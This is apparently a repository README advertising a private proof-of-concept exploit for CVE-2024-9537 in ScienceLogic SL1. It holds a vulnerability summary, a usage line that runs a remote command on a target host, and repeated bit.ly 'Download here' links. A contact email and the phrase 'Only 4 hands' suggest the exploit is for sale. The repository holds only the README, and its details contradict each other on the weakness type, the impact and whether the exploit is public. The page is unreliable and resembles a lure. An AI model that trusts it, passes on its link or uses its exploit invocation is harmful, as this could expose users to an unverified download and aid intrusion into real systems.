CVE-2024-9537 PoC: ScienceLogic SL1 Security Vulnerability

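Source
Related vulnerability
Title: ScienceLogic SL1 Security Vulnerability (CVE-2024-9537)
Description: ScienceLogic SL1 is an application from ScienceLogic. It connects your estate together, enabling multi-directional data flows and workflow automation. ScienceLogic SL1 contains a security vulnerability. An attacker can exploit this vulnerability to execute code remotely.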
Description
Authentication Bypass Using an Alternate Path or Channel
Introduction
# CVE-2024-9537-Inclusion of Functionality from Untrusted Control Sphere
# Overview
ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1.
# Exploit
## [**Download here**](https://bit.ly/40scV3G) 
## Details 
+ **CVE ID**: [CVE-2024-9537](https://nvd.nist.gov/vuln/detail/CVE-2024-9537)
+ **Published**: 10/18/2024
+ **Impact**: Loss of confidentiality
+ **Exploit availability**: Not public, only private.
+ **CVSS**: 9.8


## Vulnerability Description
This vulnerability has a critical severity with a CVSS v3.1 base score of 9.8 and a CVSS v4.0 base score of 9.3. It can be exploited over the network without requiring user interaction or privileges. The vulnerability has high impact on confidentiality, integrity, and availability of the affected systems. Given the network attack vector and low attack complexity, this vulnerability could potentially lead to unauthorized access, data breaches, and system compromise. The vulnerability is actively being exploited in the wild and was added to the CISA Known Exploited Vulnerability list.
## Affected versions 
SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.
## Running
To run the exploit you need Python 3.9. Execute:
```
python CVE-2024-9537.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/40scV3G) (Only 4 hands)

![image](https://github.com/user-attachments/assets/6887fbb1-f099-4045-a139-aa687895d57f)
![image](https://github.com/user-attachments/assets/1a37cb12-0a1f-488b-80c6-c539d25afcee)
File snapshot

```
[4.0K] /data/pocs/4accfcf6e5b1e402cd2949218331ca0f090f3322
└── [1.7K] README.md

0 directories, 1 file
```